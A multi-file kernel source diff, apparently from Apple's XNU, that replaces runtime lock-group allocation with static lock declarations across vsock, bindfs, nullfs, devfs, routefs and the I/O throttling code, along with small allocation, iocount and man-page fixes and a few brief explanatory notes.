+       MALLOC(addr, struct sockaddr_vm *, sizeof(*addr), M_SONAME,
+           M_WAITOK | M_ZERO);
        if (!addr) {
                return NULL;
        }
 
-       bzero(addr, sizeof(*addr));
        addr->svm_len = sizeof(*addr);
        addr->svm_family = AF_VSOCK;
        addr->svm_port = address->port;
@@ -629,7 +630,7 @@ vsock_reset_transport(struct vsock_transport *transport)
        struct vsockpcb *pcb = NULL;
        struct vsockpcb *tmp_pcb = NULL;
 
-       lck_rw_lock_exclusive(vsockinfo.bound_lock);
+       lck_rw_lock_exclusive(&vsockinfo.bound_lock);
        LIST_FOREACH_SAFE(pcb, &vsockinfo.bound, bound, tmp_pcb) {
                // Disconnect this transport's sockets. Listen and bind sockets must stay alive.
                socket_lock(pcb->so, 1);
@@ -641,7 +642,7 @@ vsock_reset_transport(struct vsock_transport *transport)
                }
                socket_unlock(pcb->so, 1);
        }
-       lck_rw_done(vsockinfo.bound_lock);
+       lck_rw_done(&vsockinfo.bound_lock);
 
        return error;
 }
@@ -722,10 +723,10 @@ vsock_pcblist SYSCTL_HANDLER_ARGS
        }
 
        // Get the generation count and the count of all vsock sockets.
-       lck_rw_lock_shared(vsockinfo.all_lock);
+       lck_rw_lock_shared(&vsockinfo.all_lock);
        uint64_t n = vsockinfo.all_pcb_count;
        vsock_gen_t gen_count = vsockinfo.vsock_gencnt;
-       lck_rw_done(vsockinfo.all_lock);
+       lck_rw_done(&vsockinfo.all_lock);
 
        const size_t xpcb_len = sizeof(struct xvsockpcb);
        struct xvsockpgen xvg;
@@ -758,7 +759,7 @@ vsock_pcblist SYSCTL_HANDLER_ARGS
                return 0;
        }
 
-       lck_rw_lock_shared(vsockinfo.all_lock);
+       lck_rw_lock_shared(&vsockinfo.all_lock);
 
        n = 0;
        struct vsockpcb *pcb = NULL;
@@ -803,7 +804,7 @@ vsock_pcblist SYSCTL_HANDLER_ARGS
        // Update the generation count to match the sockets being returned.
        gen_count = vsockinfo.vsock_gencnt;
 
-       lck_rw_done(vsockinfo.all_lock);
+       lck_rw_done(&vsockinfo.all_lock);
 
        if (!error) {
                /*
@@ -886,11 +887,11 @@ vsock_attach(struct socket *so, int proto, struct proc *p)
        }
 
        // Add to the list of all vsock sockets.
-       lck_rw_lock_exclusive(vsockinfo.all_lock);
+       lck_rw_lock_exclusive(&vsockinfo.all_lock);
        TAILQ_INSERT_TAIL(&vsockinfo.all, pcb, all);
        vsockinfo.all_pcb_count++;
        pcb->vsock_gencnt = ++vsockinfo.vsock_gencnt;
-       lck_rw_done(vsockinfo.all_lock);
+       lck_rw_done(&vsockinfo.all_lock);
 
        return 0;
 }
@@ -950,13 +951,13 @@ vsock_detach(struct socket *so)
        }
 
        // Remove from the list of all vsock sockets.
-       lck_rw_lock_exclusive(vsockinfo.all_lock);
+       lck_rw_lock_exclusive(&vsockinfo.all_lock);
        TAILQ_REMOVE(&vsockinfo.all, pcb, all);
        pcb->all.tqe_next = NULL;
        pcb->all.tqe_prev = NULL;
        vsockinfo.all_pcb_count--;
        vsockinfo.vsock_gencnt++;
-       lck_rw_done(vsockinfo.all_lock);
+       lck_rw_done(&vsockinfo.all_lock);
 
        // Deallocate any resources.
        zfree(vsockpcb_zone, pcb);
@@ -1380,15 +1381,9 @@ vsock_init(struct protosw *pp, struct domain *dp)
        }
 
        // Setup VSock protocol info struct.
-       vsockinfo.vsock_lock_grp_attr = lck_grp_attr_alloc_init();
-       vsockinfo.vsock_lock_grp = lck_grp_alloc_init("vsock", vsockinfo.vsock_lock_grp_attr);
-       vsockinfo.vsock_lock_attr = lck_attr_alloc_init();
-       if ((vsockinfo.all_lock = lck_rw_alloc_init(vsockinfo.vsock_lock_grp, vsockinfo.vsock_lock_attr)) == NULL ||
-           (vsockinfo.bound_lock = lck_rw_alloc_init(vsockinfo.vsock_lock_grp, vsockinfo.vsock_lock_attr)) == NULL) {
-               panic("%s: unable to allocate PCB lock\n", __func__);
-               /* NOTREACHED */
-       }
-       lck_mtx_init(&vsockinfo.port_lock, vsockinfo.vsock_lock_grp, vsockinfo.vsock_lock_attr);
+       lck_rw_init(&vsockinfo.all_lock, &vsock_lock_grp, LCK_ATTR_NULL);
+       lck_rw_init(&vsockinfo.bound_lock, &vsock_lock_grp, LCK_ATTR_NULL);
+       lck_mtx_init(&vsockinfo.port_lock, &vsock_lock_grp, LCK_ATTR_NULL);
        TAILQ_INIT(&vsockinfo.all);
        LIST_INIT(&vsockinfo.bound);
        vsockinfo.last_port = VMADDR_PORT_ANY;
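A minimal sketch of the embedded read-write lock setup adopted in this hunk; my_lock_grp, struct my_info and the function names are hypothetical. The lock group is declared statically and the locks live inside the owning structure, so only the lck_rw_init()/lck_mtx_init() calls remain and the old allocation-failure panic goes away:

    static LCK_GRP_DECLARE(my_lock_grp, "my_subsystem");

    struct my_info {
            lck_rw_t        list_lock;
            lck_mtx_t       state_lock;
    };

    static struct my_info my_info;

    static void
    my_info_init(void)
    {
            lck_rw_init(&my_info.list_lock, &my_lock_grp, LCK_ATTR_NULL);
            lck_mtx_init(&my_info.state_lock, &my_lock_grp, LCK_ATTR_NULL);
    }

    static void
    my_list_walk(void)
    {
            lck_rw_lock_shared(&my_info.list_lock);
            /* ... read-side traversal ... */
            lck_rw_done(&my_info.list_lock);
    }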
index 114321e0d15400f91c2ef897f0f336925ebb17d5..56b8d0a9296d7762afdc81619ecbccaff249dda5 100644 (file)
@@ -44,7 +44,7 @@ The cloned file
 .Fa dst
 shares its data blocks with the
 .Fa src
-file but has its own copy of attributes, extended attributes and ACL's which are identical to
+file but has its own copy of attributes and extended attributes which are identical to
 those of the named file
 .Fa src
 with the exceptions listed below
index 586707fa6596aaf8f53bb14758c5c4b64ae24766..98e6e25bb3c8e5bc2854ee1c4e11fbb164a09395 100644 (file)
@@ -208,6 +208,8 @@ may fail with one of the following errors:
 The caller is not the super-user, and the
 .Nm mount()
 was not done by the user.
+.It Bq Er EPERM
+A system policy denied the operation.
 .It Bq Er ENOTDIR
 A component of the path is not a directory.
 .It Bq Er EINVAL
index 58b67705ef87c7edb9460831e290a9ca9c5c3a0d..2b4500f049b3be37290de67a4b84d24a18a7cfec 100644 (file)
 #define BIND_NHASH(vp) (&bind_node_hashtbl[((((uintptr_t)vp) >> vnsz2log) + (uintptr_t)vnode_mount(vp)) & bind_hash_mask])
 
 static LIST_HEAD(bind_node_hashhead, bind_node) * bind_node_hashtbl;
-static lck_mtx_t bind_hashmtx;
-static lck_attr_t * bind_hashlck_attr;
-static lck_grp_t * bind_hashlck_grp;
-static lck_grp_attr_t * bind_hashlck_grp_attr;
+static LCK_GRP_DECLARE(bind_hashlck_grp, "com.apple.filesystems.bindfs");
+static LCK_MTX_DECLARE(bind_hashmtx, &bind_hashlck_grp);
 static u_long bind_hash_mask;
 
 /*  xnu doesn't have hashes built into vnodes. This mimics what freebsd does
@@ -94,28 +92,6 @@ static int vnsz2log = 9;
 
 static int bind_hashins(struct mount *, struct bind_node *, struct vnode **);
 
-int
-bindfs_init_lck(lck_mtx_t * lck)
-{
-       int error = 1;
-       if (lck && bind_hashlck_grp && bind_hashlck_attr) {
-               lck_mtx_init(lck, bind_hashlck_grp, bind_hashlck_attr);
-               error = 0;
-       }
-       return error;
-}
-
-int
-bindfs_destroy_lck(lck_mtx_t * lck)
-{
-       int error = 1;
-       if (lck && bind_hashlck_grp) {
-               lck_mtx_destroy(lck, bind_hashlck_grp);
-               error = 0;
-       }
-       return error;
-}
-
 /*
  * Initialise cache headers
  */
@@ -124,43 +100,15 @@ bindfs_init(__unused struct vfsconf * vfsp)
 {
        BINDFSDEBUG("%s\n", __FUNCTION__);
 
-       /* assuming for now that this happens immediately and by default after fs
-        * installation */
-       bind_hashlck_grp_attr = lck_grp_attr_alloc_init();
-       if (bind_hashlck_grp_attr == NULL) {
-               goto error;
-       }
-       bind_hashlck_grp = lck_grp_alloc_init("com.apple.filesystems.bindfs", bind_hashlck_grp_attr);
-       if (bind_hashlck_grp == NULL) {
-               goto error;
-       }
-       bind_hashlck_attr = lck_attr_alloc_init();
-       if (bind_hashlck_attr == NULL) {
-               goto error;
-       }
-
        bind_node_hashtbl = hashinit(BIND_HASH_SIZE, M_TEMP, &bind_hash_mask);
        if (bind_node_hashtbl == NULL) {
                goto error;
        }
-       lck_mtx_init(&bind_hashmtx, bind_hashlck_grp, bind_hashlck_attr);
 
        BINDFSDEBUG("%s finished\n", __FUNCTION__);
        return 0;
 error:
        printf("BINDFS: failed to initialize globals\n");
-       if (bind_hashlck_grp_attr) {
-               lck_grp_attr_free(bind_hashlck_grp_attr);
-               bind_hashlck_grp_attr = NULL;
-       }
-       if (bind_hashlck_grp) {
-               lck_grp_free(bind_hashlck_grp);
-               bind_hashlck_grp = NULL;
-       }
-       if (bind_hashlck_attr) {
-               lck_attr_free(bind_hashlck_attr);
-               bind_hashlck_attr = NULL;
-       }
        return KERN_FAILURE;
 }
 
@@ -169,20 +117,7 @@ bindfs_destroy(void)
 {
        /* This gets called when the fs is uninstalled, there wasn't an exact
         * equivalent in vfsops */
-       lck_mtx_destroy(&bind_hashmtx, bind_hashlck_grp);
        hashdestroy(bind_node_hashtbl, M_TEMP, bind_hash_mask);
-       if (bind_hashlck_grp_attr) {
-               lck_grp_attr_free(bind_hashlck_grp_attr);
-               bind_hashlck_grp_attr = NULL;
-       }
-       if (bind_hashlck_grp) {
-               lck_grp_free(bind_hashlck_grp);
-               bind_hashlck_grp = NULL;
-       }
-       if (bind_hashlck_attr) {
-               lck_attr_free(bind_hashlck_attr);
-               bind_hashlck_attr = NULL;
-       }
        return 0;
 }
 
index 2290bd8902ea20441ebcb613afa83b454805c8d5..726337c1e2b4b16e4332e1cb3d7b6570821eb309 100644 (file)
@@ -246,11 +246,10 @@ notdot:
                if (error == 0) {
                        *ap->a_vpp = vp;
                }
-       }
-
-       /* if we got lvp, drop the iocount from VNOP_LOOKUP */
-       if (lvp != NULL) {
-               vnode_put(lvp);
+               /* if we got lvp, drop the iocount from VNOP_LOOKUP */
+               if (lvp != NULL) {
+                       vnode_put(lvp);
+               }
        }
 
        return error;
@@ -334,7 +333,7 @@ bindfs_readdir(struct vnop_readdir_args * ap)
                struct dirent *dep;
                size_t bytesread;
                bufsize = 3 * MIN((user_size_t)uio_resid(uio), 87371u) / 8;
-               MALLOC(bufptr, void *, bufsize, M_TEMP, M_WAITOK);
+               bufptr = kheap_alloc(KHEAP_TEMP, bufsize, Z_WAITOK);
                if (bufptr == NULL) {
                        return ENOMEM;
                }
@@ -377,7 +376,7 @@ bindfs_readdir(struct vnop_readdir_args * ap)
                        uio_setoffset(uio, uio_offset(auio));
                }
                uio_free(auio);
-               FREE(bufptr, M_TEMP);
+               kheap_free(KHEAP_TEMP, bufptr, bufsize);
        } else {
                error = VNOP_READDIR(lvp, ap->a_uio, ap->a_flags, ap->a_eofflag, ap->a_numdirent, ap->a_context);
                vnode_put(lvp);
index c50a91f4d3b3a7858037d7b433b3fe62b1e629df..c3bebc8a40fc13dac5703bb95c1bc612b13b85e4 100644 (file)
@@ -127,8 +127,6 @@ struct vnodeop_desc_fake {
 __BEGIN_DECLS
 
 int bindfs_init(struct vfsconf * vfsp);
-int bindfs_init_lck(lck_mtx_t * lck);
-int bindfs_destroy_lck(lck_mtx_t * lck);
 int bindfs_destroy(void);
 int bind_nodeget(
        struct mount * mp, struct vnode * lowervp, struct vnode * dvp, struct vnode ** vpp, struct componentname * cnp, int root);
index 9c861796f8e9f6ec296660af2b3dbc9d0f15ec03..c615ea6204c62b16aa65ecf5738d7146a780e549 100644 (file)
@@ -113,8 +113,8 @@ u_long fdhash;
 
 static int fdesc_attr(int fd, struct vnode_attr *vap, vfs_context_t a_context);
 
-lck_mtx_t fdesc_mtx;
-lck_grp_t *fdesc_lckgrp;
+static LCK_GRP_DECLARE(fdesc_lckgrp, "fdesc");
+static LCK_MTX_DECLARE(fdesc_mtx, &fdesc_lckgrp);
 
 static void
 fdesc_lock(void)
@@ -141,8 +141,6 @@ devfs_fdesc_init()
 
        /* XXX Make sure you have the right path... */
        fdhashtbl = hashinit(NFDCACHE, M_CACHE, &fdhash);
-       fdesc_lckgrp = lck_grp_alloc_init("fdesc", NULL);
-       lck_mtx_init(&fdesc_mtx, fdesc_lckgrp, NULL);
 
        DEVFS_LOCK();
        dev_add_entry("fd", rootdir, DEV_DEVFD, NULL, NULL, NULL, &direntp);
@@ -311,7 +309,7 @@ devfs_devfd_lookup(struct vnop_lookup_args *ap)
                *vpp = dvp;
 
                if ((error = vnode_get(dvp))) {
-                       return error;
+                       goto bad;
                }
                return 0;
        }
index 21a0ac5c07093d1eace4732d7e03410a38376c5e..5acacb6ea47d2d7cb58417e881b824a94ded98ab 100644 (file)
@@ -145,11 +145,9 @@ static devdirent_t *devfs_make_node_internal(dev_t, devfstype_t type, uid_t, gid
     int (*clone)(dev_t dev, int action), const char *fmt, va_list ap);
 
 
-lck_grp_t       * devfs_lck_grp;
-lck_grp_attr_t  * devfs_lck_grp_attr;
-lck_attr_t      * devfs_lck_attr;
-lck_mtx_t         devfs_mutex;
-lck_mtx_t         devfs_attr_mutex;
+static LCK_GRP_DECLARE(devfs_lck_grp, "devfs_lock");
+LCK_MTX_DECLARE(devfs_mutex, &devfs_lck_grp);
+LCK_MTX_DECLARE(devfs_attr_mutex, &devfs_lck_grp);
 
 os_refgrp_decl(static, devfs_refgrp, "devfs", NULL);
 
@@ -183,14 +181,6 @@ devfs_sinit(void)
 {
        int error;
 
-       devfs_lck_grp_attr = lck_grp_attr_alloc_init();
-       devfs_lck_grp = lck_grp_alloc_init("devfs_lock", devfs_lck_grp_attr);
-
-       devfs_lck_attr = lck_attr_alloc_init();
-
-       lck_mtx_init(&devfs_mutex, devfs_lck_grp, devfs_lck_attr);
-       lck_mtx_init(&devfs_attr_mutex, devfs_lck_grp, devfs_lck_attr);
-
        DEVFS_LOCK();
        error = dev_add_entry("root", NULL, DEV_DIR, NULL, NULL, NULL, &dev_root);
        DEVFS_UNLOCK();
index f01b268732f42bd901513015bade0535555dcb06..d5426b182d3e09789e93b1220b393628d58e4ca2 100644 (file)
@@ -495,7 +495,7 @@ devfs_kernel_mount(char * mntname)
        vfs_context_t ctx = vfs_context_kernel();
        char fsname[] = "devfs";
 
-       error = kernel_mount(fsname, NULLVP, NULLVP, mntname, NULL, 0, MNT_DONTBROWSE, KERNEL_MOUNT_NOAUTH, ctx);
+       error = kernel_mount(fsname, NULLVP, NULLVP, mntname, NULL, 0, MNT_DONTBROWSE, KERNEL_MOUNT_NOAUTH | KERNEL_MOUNT_DEVFS, ctx);
        if (error) {
                printf("devfs_kernel_mount: kernel_mount failed: %d\n", error);
                return error;
index dab2af73415b181f098220da4fa9938de0323b24..07c91ffaf686f4adfd5a3eff166a418653403bdd 100644 (file)
  * For the moment, mockfs is not marked in vfs_conf.c as being threadsafe.
  */
 
-extern lck_attr_t     * mockfs_mtx_attr;
-extern lck_grp_attr_t * mockfs_grp_attr;
-extern lck_grp_t      * mockfs_mtx_grp;
-
 struct mockfs_mount {
        lck_mtx_t       mockfs_mnt_mtx;         /* Mount-wide (and tree-wide) mutex */
        mockfs_fsnode_t mockfs_root;            /* Root of the node tree */
index 4a524a0546a91a02a8f8c6e57aff75e5ff16443c..588fa7aadfd70fcd2359f49bdb9d7272c3a5daf2 100644 (file)
@@ -39,9 +39,7 @@
 #include <sys/mount_internal.h>
 #include <sys/vnode_internal.h>
 
-lck_attr_t * mockfs_mtx_attr = (lck_attr_t *) 0;
-lck_grp_attr_t * mockfs_grp_attr = (lck_grp_attr_t *) 0;
-lck_grp_t * mockfs_mtx_grp = (lck_grp_t *) 0;
+static LCK_GRP_DECLARE(mockfs_mtx_grp, "mockfs-mutex");
 
 int mockfs_mountroot(mount_t mp, vnode_t rvp, __unused vfs_context_t ctx);
 
@@ -111,7 +109,7 @@ mockfs_mountroot(mount_t mp, vnode_t rvp, __unused vfs_context_t ctx)
                }
        }
 
-       lck_mtx_init(&mockfs_mount_data->mockfs_mnt_mtx, mockfs_mtx_grp, mockfs_mtx_attr);
+       lck_mtx_init(&mockfs_mount_data->mockfs_mnt_mtx, &mockfs_mtx_grp, LCK_ATTR_NULL);
 
        /*
         * All of the needed nodes/structures have been set up; now we just need to establish the relationships
@@ -140,7 +138,7 @@ done:
                        mockfs_fsnode_destroy(root_fsnode);
                }
                if (mockfs_mount_data) {
-                       lck_mtx_destroy(&mockfs_mount_data->mockfs_mnt_mtx, mockfs_mtx_grp);
+                       lck_mtx_destroy(&mockfs_mount_data->mockfs_mnt_mtx, &mockfs_mtx_grp);
                        FREE(mockfs_mount_data, M_TEMP);
                }
        }
@@ -193,7 +191,7 @@ mockfs_unmount(struct mount *mp, int mntflags, __unused vfs_context_t ctx)
                panic("mockfs_unmount: Failed to destroy the fsnode tree");
        }
 
-       lck_mtx_destroy(&mockfs_mnt->mockfs_mnt_mtx, mockfs_mtx_grp);
+       lck_mtx_destroy(&mockfs_mnt->mockfs_mnt_mtx, &mockfs_mtx_grp);
        FREE(mockfs_mnt, M_TEMP);
        mp->mnt_data = NULL;
 
@@ -227,28 +225,9 @@ mockfs_sync(__unused struct mount *mp, __unused int waitfor, __unused vfs_contex
        return 0;
 }
 
-/*
- * mockfs_init:
- *   Run once (during VFS initialization); takes care of generic mockfs initialization (which for now, means
- *   global lock information).
- *
- * Returns 0 on success, or an error.
- */
 int
 mockfs_init(__unused struct vfsconf * vfsc)
 {
-       mockfs_mtx_attr = lck_attr_alloc_init();
-       mockfs_grp_attr = lck_grp_attr_alloc_init();
-       mockfs_mtx_grp = lck_grp_alloc_init("mockfs-mutex", mockfs_grp_attr);
-
-       /*
-        * If we've failed to allocate this early in boot, something is horrendously wrong; it should be fine to
-        *   panic (for now).
-        */
-       if (!mockfs_mtx_attr || !mockfs_grp_attr || !mockfs_mtx_grp) {
-               panic("mockfs_init failed to allocate lock information");
-       }
-
        return 0;
 }
 
index caffb546ae3eee8e0bdc121468e343b53773064b..4561bec50a4e787ab7fcadf6575b8cd535b4cd93 100644 (file)
 #define NULL_NHASH(vp) (&null_node_hashtbl[((((uintptr_t)vp) >> vnsz2log) + (uintptr_t)vnode_mount(vp)) & null_hash_mask])
 
 static LIST_HEAD(null_node_hashhead, null_node) * null_node_hashtbl;
-static lck_mtx_t null_hashmtx;
-static lck_attr_t * null_hashlck_attr;
-static lck_grp_t * null_hashlck_grp;
-static lck_grp_attr_t * null_hashlck_grp_attr;
+static LCK_GRP_DECLARE(null_hashlck_grp, "com.apple.filesystems.nullfs");
+static LCK_MTX_DECLARE(null_hashmtx, &null_hashlck_grp);
 static u_long null_hash_mask;
 
 /* os x doesn't have hashes built into vnode. gonna try doing what freebsd does
@@ -97,26 +95,16 @@ static int vnsz2log = 9;
 
 static int null_hashins(struct mount *, struct null_node *, struct vnode **);
 
-int
+void
 nullfs_init_lck(lck_mtx_t * lck)
 {
-       int error = 1;
-       if (lck && null_hashlck_grp && null_hashlck_attr) {
-               lck_mtx_init(lck, null_hashlck_grp, null_hashlck_attr);
-               error = 0;
-       }
-       return error;
+       lck_mtx_init(lck, &null_hashlck_grp, LCK_ATTR_NULL);
 }
 
-int
+void
 nullfs_destroy_lck(lck_mtx_t * lck)
 {
-       int error = 1;
-       if (lck && null_hashlck_grp) {
-               lck_mtx_destroy(lck, null_hashlck_grp);
-               error = 0;
-       }
-       return error;
+       lck_mtx_destroy(lck, &null_hashlck_grp);
 }
 
 /*
@@ -126,62 +114,17 @@ int
 nullfs_init(__unused struct vfsconf * vfsp)
 {
        NULLFSDEBUG("%s\n", __FUNCTION__);
-
-       /* assuming for now that this happens immediately and by default after fs
-        * installation */
-       null_hashlck_grp_attr = lck_grp_attr_alloc_init();
-       if (null_hashlck_grp_attr == NULL) {
-               goto error;
-       }
-       null_hashlck_grp = lck_grp_alloc_init("com.apple.filesystems.nullfs", null_hashlck_grp_attr);
-       if (null_hashlck_grp == NULL) {
-               goto error;
-       }
-       null_hashlck_attr = lck_attr_alloc_init();
-       if (null_hashlck_attr == NULL) {
-               goto error;
-       }
-
-       lck_mtx_init(&null_hashmtx, null_hashlck_grp, null_hashlck_attr);
        null_node_hashtbl = hashinit(NULL_HASH_SIZE, M_TEMP, &null_hash_mask);
        NULLFSDEBUG("%s finished\n", __FUNCTION__);
        return 0;
-error:
-       printf("NULLFS: failed to get lock element\n");
-       if (null_hashlck_grp_attr) {
-               lck_grp_attr_free(null_hashlck_grp_attr);
-               null_hashlck_grp_attr = NULL;
-       }
-       if (null_hashlck_grp) {
-               lck_grp_free(null_hashlck_grp);
-               null_hashlck_grp = NULL;
-       }
-       if (null_hashlck_attr) {
-               lck_attr_free(null_hashlck_attr);
-               null_hashlck_attr = NULL;
-       }
-       return KERN_FAILURE;
 }
 
 int
-nullfs_uninit()
+nullfs_uninit(void)
 {
        /* This gets called when the fs is uninstalled, there wasn't an exact
         * equivalent in vfsops */
-       lck_mtx_destroy(&null_hashmtx, null_hashlck_grp);
        hashdestroy(null_node_hashtbl, M_TEMP, null_hash_mask);
-       if (null_hashlck_grp_attr) {
-               lck_grp_attr_free(null_hashlck_grp_attr);
-               null_hashlck_grp_attr = NULL;
-       }
-       if (null_hashlck_grp) {
-               lck_grp_free(null_hashlck_grp);
-               null_hashlck_grp = NULL;
-       }
-       if (null_hashlck_attr) {
-               lck_attr_free(null_hashlck_attr);
-               null_hashlck_attr = NULL;
-       }
        return 0;
 }
 
index b09395429b7c69dc0c6e8237d0d8324a30909685..c0f5ac6e7fe38de0259b77598121d42cdcf10a89 100644 (file)
@@ -221,10 +221,7 @@ nullfs_mount(struct mount * mp, __unused vnode_t devvp, user_addr_t user_data, v
        vnode_ref(vp);
        vnode_put(vp);
 
-       error = nullfs_init_lck(&xmp->nullm_lock);
-       if (error) {
-               goto error;
-       }
+       nullfs_init_lck(&xmp->nullm_lock);
 
        xmp->nullm_rootvp = vp;
 
index a351309c3c6e5f355076d51973106da91bb89a9e..176f84e7419e7ab3a83fa88c5d8840d640b7f738 100644 (file)
@@ -403,6 +403,9 @@ null_get_lowerparent(vnode_t lvp, vnode_t * dvpp, vfs_context_t ctx)
        error = vnode_getattr(lvp, &va, ctx);
 
        if (error || !VATTR_IS_SUPPORTED(&va, va_parentid)) {
+               if (!error) {
+                       error = ENOTSUP;
+               }
                goto end;
        }
 
@@ -605,11 +608,10 @@ notdot:
                if (error == 0) {
                        *ap->a_vpp = vp;
                }
-       }
-
-       /* if we got lvp, drop the iocount from VNOP_LOOKUP */
-       if (lvp != NULL) {
-               vnode_put(lvp);
+               /* if we got lvp, drop the iocount from VNOP_LOOKUP */
+               if (lvp != NULL) {
+                       vnode_put(lvp);
+               }
        }
 
        nullfs_cleanup_patched_context(null_mp, ectx);
index 4dd8d50f62a2a83a20e2da28f5aec4986558b6b7..0ed22771f2a8ce9eb4a05dc989e42abb23a17501 100644 (file)
@@ -139,8 +139,8 @@ struct vnodeop_desc_fake {
 __BEGIN_DECLS
 
 int nullfs_init(struct vfsconf * vfsp);
-int nullfs_init_lck(lck_mtx_t * lck);
-int nullfs_destroy_lck(lck_mtx_t * lck);
+void nullfs_init_lck(lck_mtx_t * lck);
+void nullfs_destroy_lck(lck_mtx_t * lck);
 int nullfs_uninit(void);
 int null_nodeget(
        struct mount * mp, struct vnode * lowervp, struct vnode * dvp, struct vnode ** vpp, struct componentname * cnp, int root);
index 42e0822031608aedda5c162677cd45b294a099d3..a4f8fc1700a4f4c42c5b71036b34101d2b0f212d 100644 (file)
@@ -65,25 +65,16 @@ static int routefserr_lookup(__unused struct vnop_lookup_args * args);
 static int routefserr_setlabel(__unused struct vnop_setlabel_args * args);
 
 
-lck_grp_t       * routefs_lck_grp;
-lck_grp_attr_t  * routefs_lck_grp_attr;
-lck_attr_t      * routefs_lck_attr;
-lck_mtx_t         routefs_mutex;
+LCK_GRP_DECLARE(routefs_lck_grp, "routefs_lock");
+LCK_MTX_DECLARE(routefs_mutex, &routefs_lck_grp);
 
 #define ROUTEFS_LOCK()    lck_mtx_lock(&routefs_mutex)
 #define ROUTEFS_UNLOCK()  lck_mtx_unlock(&routefs_mutex)
-static int _lock_inited = 0;
 static boolean_t _fs_alreadyMounted = FALSE;  /* at least one mount of this filesystem is present */
 
 static int
 routefs_init(__unused struct vfsconf *vfsp)
 {
-       routefs_lck_grp_attr = lck_grp_attr_alloc_init();
-       routefs_lck_grp = lck_grp_alloc_init("routefs_lock", routefs_lck_grp_attr);
-       routefs_lck_attr = lck_attr_alloc_init();
-       lck_mtx_init(&routefs_mutex, routefs_lck_grp, routefs_lck_attr);
-       _lock_inited = 1;
-
        return 0;
 }
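routefs goes one step further: both the group and the mutex themselves are declared statically, so routefs_init() has nothing left to do and the _lock_inited guard disappears. The end state of this hunk, condensed into one sketch for readability:

LCK_GRP_DECLARE(routefs_lck_grp, "routefs_lock");
LCK_MTX_DECLARE(routefs_mutex, &routefs_lck_grp);

#define ROUTEFS_LOCK()    lck_mtx_lock(&routefs_mutex)
#define ROUTEFS_UNLOCK()  lck_mtx_unlock(&routefs_mutex)

static int
routefs_init(__unused struct vfsconf *vfsp)
{
        /* Nothing to set up: the mutex is valid from boot. */
        return 0;
}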
 
index eaa194215874e1e822d17096c8a5e1982ef60e75..cb15e014634ac133a9d20e91a87a1e9637dd53c1 100644 (file)
 #include <sys/kdebug.h>
 #include <libkern/section_keywords.h>
 
+#if CONFIG_IO_COMPRESSION_STATS
+#include <vfs/vfs_io_compression_stats.h>
+#endif /* CONFIG_IO_COMPRESSION_STATS */
+
 /* XXX following three prototypes should be in a header file somewhere */
 extern dev_t    chrtoblk(dev_t dev);
 extern boolean_t        iskmemdev(dev_t dev);
@@ -943,9 +947,7 @@ SYSCTL_INT(_debug, OID_AUTO, lowpri_throttle_tier3_io_period_ssd_msecs, CTLFLAG_
 SYSCTL_INT(_debug, OID_AUTO, lowpri_throttle_enabled, CTLFLAG_RW | CTLFLAG_LOCKED, &lowpri_throttle_enabled, 0, "");
 
 
-static lck_grp_t        *throttle_lock_grp;
-static lck_attr_t       *throttle_lock_attr;
-static lck_grp_attr_t   *throttle_lock_grp_attr;
+static LCK_GRP_DECLARE(throttle_lock_grp, "throttle I/O");
 
 
 /*
@@ -997,7 +999,7 @@ throttle_info_rel(struct _throttle_io_info_t *info)
        if ((info->throttle_refcnt == 0) && (info->throttle_alloc)) {
                DEBUG_ALLOC_THROTTLE_INFO("Freeing info = %p\n", info);
 
-               lck_mtx_destroy(&info->throttle_lock, throttle_lock_grp);
+               lck_mtx_destroy(&info->throttle_lock, &throttle_lock_grp);
                FREE(info, M_TEMP);
        }
        return oldValue;
@@ -1412,24 +1414,14 @@ throttle_init(void)
 #if CONFIG_IOSCHED
        int     iosched;
 #endif
-       /*
-        * allocate lock group attribute and group
-        */
-       throttle_lock_grp_attr = lck_grp_attr_alloc_init();
-       throttle_lock_grp = lck_grp_alloc_init("throttle I/O", throttle_lock_grp_attr);
 
        /* Update throttle parameters based on device tree configuration */
        throttle_init_throttle_window();
 
-       /*
-        * allocate the lock attribute
-        */
-       throttle_lock_attr = lck_attr_alloc_init();
-
        for (i = 0; i < LOWPRI_MAX_NUM_DEV; i++) {
                info = &_throttle_io_info[i];
 
-               lck_mtx_init(&info->throttle_lock, throttle_lock_grp, throttle_lock_attr);
+               lck_mtx_init(&info->throttle_lock, &throttle_lock_grp, LCK_ATTR_NULL);
                info->throttle_timer_call = thread_call_allocate((thread_call_func_t)throttle_timer, (thread_call_param_t)info);
 
                for (level = 0; level <= THROTTLE_LEVEL_END; level++) {
@@ -1547,7 +1539,7 @@ throttle_info_create(void)
        DEBUG_ALLOC_THROTTLE_INFO("Creating info = %p\n", info, info );
        info->throttle_alloc = TRUE;
 
-       lck_mtx_init(&info->throttle_lock, throttle_lock_grp, throttle_lock_attr);
+       lck_mtx_init(&info->throttle_lock, &throttle_lock_grp, LCK_ATTR_NULL);
        info->throttle_timer_call = thread_call_allocate((thread_call_func_t)throttle_timer, (thread_call_param_t)info);
 
        for (level = 0; level <= THROTTLE_LEVEL_END; level++) {
@@ -2127,6 +2119,12 @@ throttle_get_thread_effective_io_policy()
        return proc_get_effective_thread_policy(current_thread(), TASK_POLICY_IO);
 }
 
+int
+throttle_thread_io_tier_above_metadata(void)
+{
+       return throttle_get_thread_effective_io_policy() < IOSCHED_METADATA_TIER;
+}
+
 void
 throttle_info_reset_window(uthread_t ut)
 {
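throttle_thread_io_tier_above_metadata() is a new one-line predicate: true when the calling thread's effective I/O policy is numerically lower (i.e. better) than IOSCHED_METADATA_TIER. A hypothetical caller, not taken from this diff, showing how a filesystem might pair it with the BA_EXPEDITED_META_IO flag handled in the next hunk:

/* Hypothetical use only: request the expedited metadata tier when the
 * issuing thread already runs above the normal metadata tier. */
if ((bap->ba_flags & BA_META) && throttle_thread_io_tier_above_metadata()) {
        bap->ba_flags |= BA_EXPEDITED_META_IO;
}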
@@ -2515,20 +2513,27 @@ spec_strategy(struct vnop_strategy_args *ap)
 
 #if CONFIG_IOSCHED
        /*
-        * For I/O Scheduling, we currently do not have a way to track and expedite metadata I/Os.
-        * To ensure we dont get into priority inversions due to metadata I/Os, we use the following rules:
-        * For metadata reads, ceil all I/Os to IOSCHED_METADATA_TIER & mark them passive if the I/O tier was upgraded
-        * For metadata writes, unconditionally mark them as IOSCHED_METADATA_TIER and passive
+        * For metadata reads, ceil the I/O tier to IOSCHED_METADATA_EXPEDITED_TIER if they are expedited, otherwise
+        * ceil it to IOSCHED_METADATA_TIER. Mark them passive if the I/O tier was upgraded.
+        * For metadata writes, set the I/O tier to IOSCHED_METADATA_EXPEDITED_TIER if they are expedited. Otherwise
+        * set it to IOSCHED_METADATA_TIER. In addition, mark them as passive.
         */
